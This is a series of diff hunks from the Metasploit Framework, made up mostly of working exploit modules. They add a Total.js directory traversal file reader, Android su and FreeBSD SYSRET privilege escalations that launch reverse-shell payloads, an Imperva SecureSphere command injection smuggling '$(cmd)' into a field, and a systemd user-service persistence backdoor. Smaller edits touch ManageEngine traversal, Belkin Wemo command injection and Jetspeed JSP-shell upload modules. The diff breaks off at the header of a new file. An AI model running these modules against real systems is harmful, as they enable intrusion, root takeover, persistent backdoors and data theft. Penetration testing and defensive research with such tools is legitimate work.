    traverse = "..\\..\\..\\..\\..\\..\\..\\..\\..\\..\\"
    filename = datastore['FILEPATH']

+    res = send_request_raw({
+      'uri' => "/scheduleresult.de",
+      'method' => 'GET'
+    }, 25)
+
+    if res && res.code != 200
+      print_error("Target is not ManageEngine DeviceExpert")
+      return
+    end
+
    res = send_request_raw({
      'uri' => "/scheduleresult.de/?FileName=#{traverse}#{filename}",
      'method' => 'GET'
    }, 25)

    if res
-      print_status("#{ip}:#{rport} returns: #{res.code.to_s}")
+      case res.code
+      when 200
+        print_status("#{ip}:#{rport} returns: #{res.code.to_s}")
+      when 404
+        print_error("#{ip}:#{rport} - file not found")
+        return
+      end
    else
      print_error("Unable to communicate with #{ip}:#{rport}")
      return
@@ -68,7 +84,7 @@ class MetasploitModule < Msf::Auxiliary
        res.body,
        fname)

-      print_status("#{ip}:#{rport} - File saved in: #{path}")
+      print_good("#{ip}:#{rport} - File saved in: #{path}")
    end
  end
 end
@@ -0,0 +1,151 @@
+##
+# This module requires Metasploit: https://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+# Check and exploit Total.js Directory Traversal (CVE-2019-8903)
+class MetasploitModule < Msf::Auxiliary
+  include Msf::Exploit::Remote::HttpClient
+
+  def initialize(info = {})
+    super(update_info(info,
+      'Name' => 'Total.js prior to 3.2.4 Directory Traversal',
+      'Description' => %q(
+        This module check and exploits a directory traversal vulnerability in Total.js prior to 3.2.4.
+
+        Here is a list of accepted extensions: flac, jpg, jpeg, png, gif, ico, js, css, txt, xml,
+        woff, woff2, otf, ttf, eot, svg, zip, rar, pdf, docx, xlsx, doc, xls, html, htm, appcache,
+        manifest, map, ogv, ogg, mp4, mp3, webp, webm, swf, package, json, md, m4v, jsx, heif, heic
+      ),
+      'Author' =>
+        [
+          'Riccardo Krauter', # Discovery
+          'Fabio Cogno'       # Metasploit module
+        ],
+      'License' => MSF_LICENSE,
+      'References' =>
+        [
+          ['CVE', '2019-8903'],
+          ['CWE', '22'],
+          ['URL', 'https://blog.totaljs.com/blogs/news/20190213-a-critical-security-fix/'],
+          ['URL', 'https://snyk.io/vuln/SNYK-JS-TOTALJS-173710']
+        ],
+      'Privileged' => false,
+      'DisclosureDate' => 'Feb 18 2019',
+      'Actions' =>
+        [
+          ['CHECK', { 'Description' => 'Check if the target is vulnerable' }],
+          ['READ', { 'Description' => 'Attempt to print file content' }],
+          ['DOWNLOAD', { 'Description' => 'Attempt to download a file' }]
+        ],
+      'DefaultAction' => 'CHECK'))
+
+    register_options(
+      [
+        OptString.new('TARGETURI', [true, 'Path to Total.js App installation', '/']),
+        OptInt.new('DEPTH', [true, 'Traversal depth', 1]),
+        OptString.new('FILE', [true, 'File to obtain', 'databases/settings.json'])
+      ]
+    )
+  end
+
+  def check_ext
+    extensions = %w[
+      flac jpg jpeg png gif ico js css txt xml
+      woff woff2 otf ttf eot svg zip rar pdf
+      docx xlsx doc xls html htm appcache
+      manifest map ogv ogg mp4 mp3 webp webm
+      swf package json md m4v jsx heif heic
+    ]
+
+    ext = datastore['FILE'].split('.').last
+
+    unless extensions.include? ext
+      print_warning "Extension #{ext} is not supported by the HTTP static route of the framework"
+    end
+  end
+
+  def check
+    uri = normalize_uri(target_uri.path) + '%2e%2e%2fpackage.json'
+    res = send_request_cgi(
+      'method' => 'GET',
+      'uri' => uri
+    )
+    if res && res.code == 200
+      json = res.get_json_document
+      if json.empty? || !json['dependencies']['total.js']
+        return Exploit::CheckCode::Safe
+      else
+        print_status("Total.js version is: #{json['dependencies']['total.js']}")
+        print_status("App name: #{json['name']}")
+        print_status("App description: #{json['description']}")
+        print_status("App version: #{json['version']}")
+        return Exploit::CheckCode::Vulnerable
+      end
+    elsif res && res.headers['X-Powered-By'].to_s.downcase.include?('total.js')
+      print_status('Target appear to be vulnerable!')
+      print_status("X-Powered-By: #{res.headers['X-Powered-By']}")
+      return Exploit::CheckCode::Detected
+    else
+      vprint_warning('No response')
+      return Exploit::CheckCode::Unknown
+    end
+  end
+
+  def read
+    check_ext
+    traverse = '%2e%2e%2f' * datastore['DEPTH']
+    uri = normalize_uri(target_uri.path) + traverse + datastore['FILE']
+
+    res = send_request_cgi(
+      'method' => 'GET',
+      'uri' => uri
+    )
+    unless res
+      fail_with(Failure::Unreachable, 'Connection failed')
+    end
+    if res.code != 200
+      print_error("Unable to read '#{datastore['FILE']}', possibly because:")
+      print_error("\t1. File does not exist.")
+      print_error("\t2. No permission.")
+      return
+    end
+    print_status("Getting #{datastore['FILE']}...")
+    print_line(res.body)
+  end
+
+  def download
+    check_ext
+    traverse = '%2e%2e%2f' * datastore['DEPTH']
+    uri = normalize_uri(target_uri.path) + traverse + datastore['FILE']
+
+    res = send_request_cgi(
+      'method' => 'GET',
+      'uri' => uri
+    )
+    unless res
+      fail_with(Failure::Unreachable, 'Connection failed')
+    end
+    if res.code != 200
+      print_error("Unable to read '#{datastore['FILE']}', possibly because:")
+      print_error("\t1. File does not exist.")
+      print_error("\t2. No permission.")
+      return
+    end
+    fname = datastore['FILE'].split('/')[-1].chop
+    ctype = res.headers['Content-Type'].split(';')
+    loot = store_loot('lfi.data', ctype[0], rhost, res.body, fname)
+    print_good("File #{fname} downloaded to: #{loot}")
+  end
+
+  def run
+    case action.name
+    when 'CHECK'
+      check
+    when 'READ'
+      read
+    when 'DOWNLOAD'
+      download
+    end
+  end
+end
@@ -31,7 +31,7 @@ class MetasploitModule < Msf::Auxiliary
        'License'        => MSF_LICENSE
      )
    )
-    deregister_options('RHOSTS', 'RPORT')
+    deregister_udp_options
  end

  def parse_reply(pkt)
@@ -26,7 +26,7 @@ class MetasploitModule < Msf::Auxiliary
        [
          'Deral "Percentx" Heiland',
          'Pete "Bokojan" Arzamendi',
-          'William Vu',
+          'wvu',
          'Dev Mohanty'
        ],
      'License'        => MSF_LICENSE
@@ -31,7 +31,7 @@ class MetasploitModule < Msf::Auxiliary
    ))

    register_options([
-      Opt::RPORT(Rex::Proto::PJL::DEFAULT_PORT),
+      Opt::RPORT(Rex::Proto::PJL::DEFAULT_PORT)
    ])
  end

@@ -31,7 +31,7 @@ class MetasploitModule < Msf::Auxiliary
    ))

    register_options([
-      Opt::RPORT(Rex::Proto::PJL::DEFAULT_PORT),
+      Opt::RPORT(Rex::Proto::PJL::DEFAULT_PORT)
    ])
  end

@@ -63,7 +63,7 @@ class MetasploitModule < Msf::Auxiliary
    if v.nil?
      vprint_error("#{ip}:#{rport} - #{version} does not appear to be libssh")
      Exploit::CheckCode::Unknown
-    elsif v == Gem::Version.new('')
+    elsif v.to_s.empty?
      vprint_warning("#{ip}:#{rport} - libssh version not reported")
      Exploit::CheckCode::Detected
    elsif v.between?(Gem::Version.new('0.6.0'), Gem::Version.new('0.7.5')) ||
@@ -28,8 +28,7 @@ class MetasploitModule < Msf::Auxiliary
      [
        OptString.new('CMD', [ true, "The windows command to run", "ipconfig /all" ]),
        OptString.new('USERNAME', [ true, "The username to authenticate as"]),
-        OptString.new('PASSWORD', [ true, "The password to authenticate with"]),
-        OptBool.new('SAVE_OUTPUT', [true, "Store output as loot", false])
+        OptString.new('PASSWORD', [ true, "The password to authenticate with"])
      ])
  end

@@ -38,13 +37,12 @@ class MetasploitModule < Msf::Auxiliary
    streams = winrm_run_cmd(datastore['CMD'])
    return unless streams.class == Hash
    print_error streams['stderr'] unless streams['stderr'] == ''
-    print_good streams['stdout']
-    if datastore['SAVE_OUTPUT']
-      path = store_loot("winrm.cmd_results", "text/plain", ip, streams['stdout'], "winrm_cmd_results.txt", "WinRM CMD Results")
-      print_good "Results saved to #{path}"
-    end
+    print_good "#{peer}: #{streams['stdout']}"
+    path = store_loot("winrm.cmd_results", "text/plain", ip, streams['stdout'], "winrm_cmd_results.txt", "WinRM CMD Results")
+    print_good "Results saved to #{path}"
  end



 end
+
@@ -19,7 +19,7 @@ class MetasploitModule < Msf::Auxiliary
      'License'        =>  MSF_LICENSE
    )

-    deregister_options('Proxies','SSL','RHOST')
+    deregister_udp_options
    register_options(
      [
        Opt::RPORT(5060),
@@ -22,7 +22,7 @@ class MetasploitModule < Msf::Auxiliary
      'License'        =>  MSF_LICENSE
    )

-    deregister_options('Proxies','SSL','RHOST')
+    deregister_udp_options
    register_options(
      [
        Opt::RPORT(5060),
@@ -0,0 +1,85 @@
+##
+# This module requires Metasploit: https://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+class MetasploitModule < Msf::Exploit::Local
+  Rank = ManualRanking
+
+  include Msf::Exploit::CmdStager
+  include Msf::Post::File
+  include Msf::Post::Android::Priv
+
+  def initialize(info={})
+    super( update_info( info, {
+      'Name'           => "Android 'su' Privilege Escalation",
+      'Description'    => %q{
+          This module uses the su binary present on rooted devices to run
+          a payload as root.
+
+          A rooted Android device will contain a su binary (often linked with
+          an application) that allows the user to run commands as root.
+          This module will use the su binary to execute a command stager
+          as root. The command stager will write a payload binary to a
+          temporary directory, make it executable, execute it in the background,
+          and finally delete the executable.
+
+          On most devices the su binary will pop-up a prompt on the device
+          asking the user for permission.
+      },
+      'License'        => MSF_LICENSE,
+      'DisclosureDate' => 'Aug 31 2017',
+      'SessionTypes'   => [ 'meterpreter', 'shell' ],
+      'Platform'       => [ 'android', 'linux' ],
+      'Arch'           => [ ARCH_AARCH64, ARCH_ARMLE, ARCH_X86, ARCH_X64, ARCH_MIPSLE ],
+      'Targets'        => [
+        ['aarch64',{'Arch' => ARCH_AARCH64}],
+        ['armle',  {'Arch' => ARCH_ARMLE}],
+        ['x86',    {'Arch' => ARCH_X86}],
+        ['x64',    {'Arch' => ARCH_X64}],
+        ['mipsle', {'Arch' => ARCH_MIPSLE}]
+      ],
+      'DefaultOptions' => {
+        'PAYLOAD' => 'linux/aarch64/meterpreter/reverse_tcp',
+        'WfsDelay' => 5,
+      },
+      'DefaultTarget'  => 0,
+      }
+    ))
+    register_options([
+      OptString.new('SU_BINARY', [true, 'The su binary to execute to obtain root', 'su']),
+      OptString.new('WritableDir', [true, 'Writable directory', '/data/local/tmp/']),
+    ])
+  end
+
+  def base_dir
+    datastore['WritableDir'].to_s
+  end
+
+  def su_bin
+    datastore['SU_BINARY'].to_s
+  end
+
+  def exploit
+    if is_root?
+      fail_with Failure::BadConfig, 'Session already has root privileges'
+    end
+
+    linemax = 4088 - su_bin.size
+    execute_cmdstager({
+      flavor: :echo,
+      enc_format: :octal,
+      prefix: '\\\\0',
+      temp: base_dir,
+      linemax: linemax,
+      background: true,
+    })
+  end
+
+  def execute_command(cmd, opts)
+    su_cmd = "#{su_bin} -c '#{cmd}'"
+    cmd_exec(su_cmd)
+  end
+
+end
+
@@ -0,0 +1,181 @@
+##
+# This module requires Metasploit: https://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+class MetasploitModule < Msf::Exploit::Local
+  Rank = GreatRanking
+
+  include Msf::Post::File
+  include Msf::Exploit::EXE
+  include Msf::Exploit::FileDropper
+
+  def initialize(info = {})
+    super(update_info(info,
+      'Name'           => 'FreeBSD Intel SYSRET Privilege Escalation',
+      'Description'    => %q{
+        This module exploits a vulnerability in the FreeBSD kernel,
+        when running on 64-bit Intel processors.
+
+        By design, 64-bit processors following the X86-64 specification will
+        trigger a general protection fault (GPF) when executing a SYSRET
+        instruction with a non-canonical address in the RCX register.
+
+        However, Intel processors check for a non-canonical address prior to
+        dropping privileges, causing a GPF in privileged mode. As a result,
+        the current userland RSP stack pointer is restored and executed,
+        resulting in privileged code execution.
+
+        This module has been tested successfully on:
+
+        FreeBSD 8.3-RELEASE (amd64); and
+        FreeBSD 9.0-RELEASE (amd64).
+      },
+      'License'        => MSF_LICENSE,
+      'Author'         =>
+        [
+          'Rafal Wojtczuk',  # Discovery
+          'John Baldwin',    # Discovery
+          'iZsh',            # Exploit
+          'bcoles'           # Metasploit
+        ],
+      'DisclosureDate' => '2012-06-12',
+      'Platform'       => ['bsd'],
+      'Arch'           => [ARCH_X64],
+      'SessionTypes'   => ['shell'],
+      'References'     =>
+        [
+          ['BID', '53856'],
+          ['CVE', '2012-0217'],
+          ['EDB', '28718'],
+          ['PACKETSTORM', '113584'],
+          ['URL', 'https://www.freebsd.org/security/patches/SA-12:04/sysret.patch'],
+          ['URL', 'https://blog.xenproject.org/2012/06/13/the-intel-sysret-privilege-escalation/'],
+          ['URL', 'https://github.com/iZsh/exploits/blob/master/stash/CVE-2012-0217-sysret/CVE-2012-0217-sysret_FreeBSD.c'],
+          ['URL', 'https://fail0verflow.com/blog/2012/cve-2012-0217-intel-sysret-freebsd/'],
+          ['URL', 'http://security.freebsd.org/advisories/FreeBSD-SA-12:04.sysret.asc'],
+          ['URL', 'https://www.slideshare.net/nkslides/exploiting-the-linux-kernel-via-intels-sysret-implementation']
+        ],
+      'Targets'        =>
+        [
+          ['Automatic', {}]
+        ],
+      'DefaultOptions' => { 'PAYLOAD' => 'bsd/x64/shell_reverse_tcp' },
+      'DefaultTarget'  => 0))
+    register_advanced_options [
+      OptBool.new('ForceExploit', [false, 'Override check result', false]),
+      OptString.new('WritableDir', [true, 'A directory where we can write files', '/tmp'])
+    ]
+  end
+
+  def base_dir
+    datastore['WritableDir'].to_s
+  end
+
+  def upload(path, data)
+    print_status "Writing '#{path}' (#{data.size} bytes) ..."
+    rm_f path
+    write_file path, data
+    register_file_for_cleanup path
+  end
+
+  def upload_and_chmodx(path, data)
+    upload path, data
+    cmd_exec "chmod +x '#{path}'"
+  end
+
+  def upload_and_compile(path, data, gcc_args='')
+    upload "#{path}.c", data
+
+    gcc_cmd = "gcc -o #{path} #{path}.c"
+    if session.type.eql? 'shell'
+      gcc_cmd = "PATH=$PATH:/usr/bin/ #{gcc_cmd}"
+    end
+    output = cmd_exec gcc_cmd
+
+    unless output.blank?
+      print_error output
+      fail_with Failure::Unknown, "#{path}.c failed to compile"
+    end
+
+    register_file_for_cleanup path
+    chmod path
+  end
+
+  def exploit_data(file)
+    ::File.binread ::File.join(Msf::Config.data_directory, 'exploits', 'cve-2012-0217', file)
+  end
+
+  def is_root?
+    (cmd_exec('id -u').to_s.gsub(/[^\d]/, '') == '0')
+  end
+
+  def strip_comments(c_code)
+    c_code.gsub(%r{/\*.*?\*/}m, '').gsub(%r{^\s*//.*$}, '')
+  end
+
+  def check
+    kernel_release = cmd_exec('uname -r').to_s
+    unless kernel_release =~ /^(8\.3|9\.0)-RELEASE/
+      vprint_error "FreeBSD version #{kernel_release} is not vulnerable"
+      return Exploit::CheckCode::Safe
+    end
+    vprint_good "FreeBSD version #{kernel_release} appears vulnerable"
+
+    arch = cmd_exec('uname -m').to_s
+    unless arch.include? '64'
+      vprint_error "System architecture #{arch} is not supported"
+      return CheckCode::Safe
+    end
+    vprint_good "System architecture #{arch} is supported"
+
+    hw_model = cmd_exec('/sbin/sysctl hw.model').to_s
+    unless hw_model.downcase.include? 'intel'
+      vprint_error "#{hw_model} is not vulnerable"
+      return CheckCode::Safe
+    end
+    vprint_good "#{hw_model} is vulnerable"
+
+    CheckCode::Appears
+  end
+
+  def exploit
+    unless check == CheckCode::Appears
+      unless datastore['ForceExploit']
+        fail_with Failure::NotVulnerable, 'Target is not vulnerable. Set ForceExploit to override.'
+      end
+      print_warning 'Target does not appear to be vulnerable'
+    end
+
+    if is_root?
+      unless datastore['ForceExploit']
+        fail_with Failure::BadConfig, 'Session already has root privileges. Set ForceExploit to override.'
+      end
+    end
+
+    unless writable? base_dir
+      fail_with Failure::BadConfig, "#{base_dir} is not writable"
+    end
+
+    # Upload and compile exploit executable
+    executable_name = ".#{rand_text_alphanumeric 5..10}"
+    executable_path = "#{base_dir}/#{executable_name}"
+    upload_and_compile executable_path, strip_comments(exploit_data('sysret.c')), '-Wall'
+
+    # Upload payload executable
+    payload_path = "#{base_dir}/.#{rand_text_alphanumeric 5..10}"
+    upload_and_chmodx payload_path, generate_payload_exe
+
+    # Launch exploit
+    print_status 'Launching exploit...'
+    output = cmd_exec executable_path
+    output.each_line { |line| vprint_status line.chomp }
+
+    unless is_root?
+      fail_with Failure::Unknown, 'Exploitation failed'
+    end
+    print_good "Success! Executing payload..."
+
+    cmd_exec payload_path
+  end
+end
@@ -0,0 +1,143 @@
+##
+# This module requires Metasploit: https://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+class MetasploitModule < Msf::Exploit::Remote
+  Rank = ExcellentRanking
+
+  include Msf::Exploit::Remote::HttpClient
+  include Msf::Exploit::CmdStager
+
+  def initialize(info = {})
+    super(
+      update_info(
+        info,
+        'Name'           => 'Imperva SecureSphere PWS Command Injection',
+        'Description'    => %q(
+          This module exploits a command injection vulnerability in Imperva
+          SecureSphere 13.x. The vulnerability exists in the PWS service,
+          where Python CGIs didn't properly sanitize user supplied command
+          parameters and directly passes them to corresponding CLI utility,
+          leading to command injection. Agent registration credential is
+          required to exploit SecureSphere in gateway mode.
+
+          This module was successfully tested on Imperva SecureSphere 13.0/13.1/
+          13.2 in pre-ftl mode and unsealed gateway mode.
+        ),
+        'License'        => MSF_LICENSE,
+        'Author'         =>
+          [
+            'rsp3ar <lukunming<at>gmail.com>' # Discovery/Metasploit Module
+          ],
+        'References'     =>
+          [
+            [ 'EDB', '45542' ]
+          ],
+        'DisclosureDate'  => "Oct 8 2018",
+        'DefaultOptions' => {
+          'SSL' => true,
+          'PrependFork' => true,
+        },
+        'Platform'        => 'linux',
+        'Arch'            => [ARCH_X86, ARCH_X64],
+        'CmdStagerFlavor' => %w{ echo printf wget },
+        'Targets'         =>
+          [
+            ['Imperva SecureSphere 13.0/13.1/13.2', {}]
+          ],
+        'DefaultTarget'   => 0))
+
+    register_options(
+      [
+        Opt::RPORT(443),
+        OptString.new('USERNAME', [true, 'Agent registration username', 'imperva']),
+        OptString.new('PASSWORD', [true, 'Agent registration password', '']),
+        OptString.new('TARGETURI', [false, 'The URI path to impcli', '/pws/impcli']),
+        OptInt.new('TIMEOUT', [false, 'HTTP connection timeout', 15])
+      ])
+    register_advanced_options [
+      OptBool.new('ForceExploit',  [false, 'Override check result', false])
+    ]
+  end
+
+  def check
+    begin
+      res = execute_command('id')
+    rescue => e
+      vprint_error("#{e}")
+      return CheckCode::Unknown
+    end
+
+    if res.body =~ /uid=\d+/
+      return CheckCode::Vulnerable
+    end
+
+    CheckCode::Safe
+  end
+
+  def exploit
+    unless CheckCode::Vulnerable == check
+      unless datastore['ForceExploit']
+        fail_with(Failure::NotVulnerable, 'Target is not vulnerable. Set ForceExploit to override.')
+      end
+      print_warning 'Target does not appear to be vulnerable'
+    end
+
+    print_status("Sending payload #{datastore['PAYLOAD']}")
+    execute_cmdstager
+  end
+
+  def execute_command(cmd, opts = {})
+    data = {
+      'command'     => 'impctl server status',
+      'parameters'  => {
+        'broadcast'         => true,
+        'installer-address' => "127.0.0.1 $(#{cmd})"
+      }
+    }
+
+    res = send_request data
+
+    return unless res
+
+    if res.code == 401
+      fail_with(Failure::NoAccess, 'Authorization Failure, valid agent registration credential is required')
+    end
+
+    unless res.code == 406 && res.body.include?("impctl")
+      fail_with(Failure::Unknown, 'Server did not respond in an expected way')
+    end
+
+    res
+  end
+
+  def send_request(data)
+    req_params = {
+      'method'      => 'POST',
+      'uri'         => normalize_uri(target_uri.path),
+      'data'        => data.to_json
+    }
+
+    if datastore['USERNAME'] && datastore['PASSWORD']
+      unless @cookie
+        res = send_request_cgi({
+          'method'      => 'GET',
+          'uri'         => normalize_uri('/')
+        })
+        unless res
+          fail_with(Failure::Unreachable, "#{peer} - Connection failed")
+        end
+
+        @cookie = res.get_cookies
+      end
+
+      req_params['cookie'] = @cookie
+      req_params['headers'] = {
+        'Authorization' => basic_auth(datastore['USERNAME'], datastore['PASSWORD'])
+      }
+    end
+
+    send_request_cgi(req_params, datastore['TIMEOUT'])
+  end
+end
@@ -38,15 +38,37 @@ class MetasploitModule < Msf::Exploit::Local
        'License'        => MSF_LICENSE,
        'Author'         =>
          [
-            'h00die <mike@shorebreaksecurity.com>'
+            'h00die <mike@shorebreaksecurity.com>',
+            'Cale Black' # systemd user target
          ],
        'Platform'       => ['unix', 'linux'],
        'Targets'        =>
          [
-            ['Auto',     {}],
-            ['System V', { :runlevel => '2 3 4 5' }],
-            ['Upstart',  { :runlevel => '2345' }],
-            ['systemd',  {}]
+            ['Auto', 'DefaultOptions' =>
+              {
+                'SHELLPATH' => '/usr/local/bin'
+              }
+            ],
+            ['System V', :runlevel => '2 3 4 5', 'DefaultOptions' =>
+              {
+                'SHELLPATH' => '/usr/local/bin'
+              }
+            ],
+            ['Upstart', :runlevel => '2345', 'DefaultOptions' =>
+              {
+                'SHELLPATH' => '/usr/local/bin'
+              }
+            ],
+            ['systemd', 'DefaultOptions' =>
+              {
+                'SHELLPATH' => '/usr/local/bin'
+              }
+            ],
+            ['systemd user', 'DefaultOptions' =>
+              {
+                'SHELLPATH' => '/tmp'
+              }
+            ]
          ],
        'DefaultTarget'  => 0,
        'Arch'           => ARCH_CMD,
@@ -75,7 +97,12 @@ class MetasploitModule < Msf::Exploit::Local
        OptPath.new('SHELLPATH', [true, 'Writable path to put our shell', '/usr/local/bin']),
        OptString.new('SHELL_NAME', [false, 'Name of shell file to write']),
        OptString.new('SERVICE', [false, 'Name of service to create'])
-      ], self.class
+      ]
+    )
+    register_advanced_options(
+      [
+        OptBool.new('EnableService', [true, 'Enable the service', true])
+      ]
    )
  end

@@ -93,6 +120,8 @@ class MetasploitModule < Msf::Exploit::Local
      upstart(path, file, target.opts[:runlevel])
    when 'systemd'
      systemd(path, file)
+    when 'systemd user'
+      systemd_user(path, file)
    else
      if service_system_exists?('systemctl')
        print_status('Utilizing systemd')
@@ -154,12 +183,71 @@ WantedBy=multi-user.target}
      print_error('File not written, check permissions.')
      return
    end
-    vprint_status('Enabling service')
-    cmd_exec("systemctl enable #{service_filename}.service")
+    if datastore['EnableService']
+      vprint_status('Enabling service')
+      cmd_exec("systemctl enable #{service_filename}.service")
+    end
    vprint_status('Starting service')
    cmd_exec("systemctl start #{service_filename}.service")
  end

+  def systemd_user(backdoor_path, backdoor_file)
+    script = <<~EOF
+      [Unit]
+      Description=Start daemon at boot time
+      After=
+      Requires=
+      [Service]
+      RemainAfterExit=yes
+      RestartSec=10s
+      Restart=always
+      TimeoutStartSec=5
+      ExecStart=/bin/sh #{backdoor_path}/#{backdoor_file}
+      [Install]
+      WantedBy=default.target
+    EOF
+    service_filename = datastore['SERVICE'] ? datastore['SERVICE'] : Rex::Text.rand_text_alpha(7)
+
+    home = cmd_exec('echo ${HOME}')
+    vprint_status("Creating user service directory")
+    cmd_exec("mkdir -p #{home}/.config/systemd/user")
+
+    service_name = "#{home}/.config/systemd/user/#{service_filename}.service"
+    vprint_status("Writing service: #{service_name}")
+
+    write_file(service_name, script)
+
+    if !file_exist?(service_name)
+      print_error('File not written, check permissions. Attempting secondary location')
+      vprint_status("Creating user secondary service directory")
+      cmd_exec("mkdir -p #{home}/.local/share/systemd/user")
+
+      service_name = "#{home}/.local/share/systemd/user/#{service_filename}.service"
+      vprint_status("Writing .local service: #{service_name}")
+      write_file(service_name, script)
+
+      if !file_exist?(service_name)
+        print_error('File not written, check permissions.')
+        return
+      end
+    end
+
+    # This was taken from pam_systemd(8)
+    systemd_socket_id = cmd_exec('id -u')
+    systemd_socket_dir = "/run/user/#{systemd_socket_id}"
+    vprint_status('Reloading manager configuration')
+    cmd_exec("XDG_RUNTIME_DIR=#{systemd_socket_dir} systemctl --user daemon-reload")
+
+    if datastore['EnableService']
+      vprint_status('Enabling service')
+      cmd_exec("XDG_RUNTIME_DIR=#{systemd_socket_dir} systemctl --user enable #{service_filename}.service")
+    end
+
+    vprint_status("Starting service: #{service_filename}")
+    # Prefer restart over start, as it will execute already existing service files
+    cmd_exec("XDG_RUNTIME_DIR=#{systemd_socket_dir} systemctl --user restart #{service_filename}")
+  end
+
  def upstart(backdoor_path, backdoor_file, runlevel)
    # http://blog.terminal.com/getting-started-with-upstart/
    script = %{description \"Start daemon at boot time\"
@@ -23,7 +23,7 @@ class MetasploitModule < Msf::Exploit::Remote
            'Steve Breen',         # Public Exploit
            'Dev Mohanty',         # Metasploit module
            'Louis Sato',          # Metasploit
-            'William Vu',          # Metasploit
+            'wvu',                 # Metasploit
            'juan vazquez',        # Metasploit
            'Wei Chen'             # Metasploit
          ],
@@ -21,7 +21,7 @@ class MetasploitModule < Msf::Exploit::Remote
      'Author'             => [
        'Paul Gebheim', # Python PoC (TCP)
        'insanid',      # Python PoC (UDP)
-        'wvu',          # Metasploit module
+        'wvu'           # Metasploit module
      ],
      'References'         => [
        ['URL', 'https://wiki.openwrt.org/toh/netgear/telnet.console'],
@@ -22,7 +22,8 @@ class MetasploitModule < Msf::Exploit::Remote
      },
      'Author'             => [
        'phikshun', # Discovery, UFuzz, and modules
-        'wvu'       # Crock-Pot testing and module
+        'wvu',      # Crock-Pot testing and module
+        'nstarke'   # Version-checking research and implementation
      ],
      'References'         => [
        ['URL', 'https://web.archive.org/web/20150901094849/http://disconnected.io/2014/04/04/universal-plug-and-fuzz/'],
@@ -59,7 +60,9 @@ class MetasploitModule < Msf::Exploit::Remote
      'DefaultTarget'      => 1,
      'Notes'              => {
        'Stability'        => [CRASH_SAFE],
-        'SideEffects'      => [ARTIFACTS_ON_DISK]
+        'SideEffects'      => [ARTIFACTS_ON_DISK],
+        'Reliablity'       => [REPEATABLE_SESSION],
+        'NOCVE'            => 'Patched in 2.00.8643'
      }
    ))

@@ -74,17 +77,41 @@ class MetasploitModule < Msf::Exploit::Remote
  end

  def check
+    checkcode = CheckCode::Unknown
+
    res = send_request_cgi(
      'method' => 'GET',
      'uri'    => '/setup.xml'
    )

-    if res && res.code == 200 && res.body.include?('urn:Belkin:device:')
-      vprint_good('Wemo-enabled device detected')
-      return CheckCode::Appears
+    unless res && res.code == 200 && res.body.include?('urn:Belkin:device:')
+      vprint_error('Wemo-enabled device not detected')
+      return checkcode
    end

-    CheckCode::Safe
+    vprint_good('Wemo-enabled device detected')
+    checkcode = CheckCode::Detected
+
+    version = (v = res.get_xml_document.at('firmwareVersion')&.text) &&
+              v =~ /WeMo_WW_(\d+(?:\.\d+)+)/ && $1 && Gem::Version.new($1)
+
+    unless version
+      vprint_error('Could not determine firmware version')
+      return checkcode
+    end
+
+    vprint_status("Found firmware version: #{version}")
+
+    # https://www.tripwire.com/state-of-security/featured/my-sector-story-root-shell-on-the-belkin-wemo-switch/
+    if version < Gem::Version.new('2.00.8643')
+      vprint_good("Firmware version #{version} < 2.00.8643")
+      checkcode = CheckCode::Appears
+    else
+      vprint_error("Firmware version #{version} >= 2.00.8643")
+      checkcode = CheckCode::Safe
+    end
+
+    checkcode
  end

  def exploit
@@ -128,16 +155,16 @@ class MetasploitModule < Msf::Exploit::Remote
  end

  def generate_soap_xml(cmd)
-    <<EOF
-<?xml version="1.0" encoding="utf-8"?>
-<s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/">
-  <s:Body>
-    <u:SetSmartDevInfo xmlns:u="urn:Belkin:service:basicevent:1">
-      <SmartDevURL>`#{cmd}`</SmartDevURL>
-    </u:SetSmartDevInfo>
-  </s:Body>
-</s:Envelope>
-EOF
+    <<~EOF
+      <?xml version="1.0" encoding="utf-8"?>
+      <s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/">
+        <s:Body>
+          <u:SetSmartDevInfo xmlns:u="urn:Belkin:service:basicevent:1">
+            <SmartDevURL>$(#{cmd})</SmartDevURL>
+          </u:SetSmartDevInfo>
+        </s:Body>
+      </s:Envelope>
+    EOF
  end

  def cmdstager_path
@@ -62,10 +62,8 @@ class MetasploitModule < Msf::Exploit::Remote
  def exploit
    print_status("Creating admin user: #{username}:#{password}")
    create_admin_user
-    # This was originally a typo... but we're having so much fun!
-    print_status('Kenny Loggins in')
-    kenny_loggins
-    print_warning('You have entered the Danger Zone')
+    print_status('Logging in as newly created admin')
+    jetspeed_login
    print_status("Uploading payload ZIP: #{zip_filename}")
    upload_payload_zip
    print_status("Executing JSP shell: /jetspeed/#{jsp_filename}")
@@ -102,7 +100,7 @@ class MetasploitModule < Msf::Exploit::Remote
    )
  end

-  def kenny_loggins
+  def jetspeed_login
    res = send_request_cgi(
      'method' => 'GET',
      'uri'    => '/jetspeed/login/redirector'
@@ -154,11 +152,11 @@ class MetasploitModule < Msf::Exploit::Remote

    case target['Platform']
    when 'linux'
-      register_files_for_cleanup("../webapps/jetspeed/#{jsp_filename}")
-      register_files_for_cleanup("../temp/#{username}/#{zip_filename}")
+      register_file_for_cleanup("../webapps/jetspeed/#{jsp_filename}")
+      register_dir_for_cleanup("../temp/#{username}")
    when 'win'
-      register_files_for_cleanup("..\\webapps\\jetspeed\\#{jsp_filename}")
-      register_files_for_cleanup("..\\temp\\#{username}\\#{zip_filename}")
+      register_file_for_cleanup("..\\webapps\\jetspeed\\#{jsp_filename}")
+      register_dir_for_cleanup("..\\temp\\#{username}")
    end

    send_request_cgi(
@@ -189,19 +187,6 @@ class MetasploitModule < Msf::Exploit::Remote
    )
  end

-  # XXX: This is a hack because FileDropper doesn't delete directories
-  def on_new_session(session)
-    super
-    case target['Platform']
-    when 'linux'
-      print_status("Deleting user temp directory: ../temp/#{username}")
-      session.shell_command_token("rm -rf ../temp/#{username}")
-    when 'win'
-      print_status("Deleting user temp directory: ..\\temp\\#{username}")
-      session.shell_command_token("rd /s /q ..\\temp\\#{username}")
-    end
-  end
-
  #
  # Utility methods
  #
@@ -0,0 +1,280 @@
+##
+# This module requires Metasploit: https://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
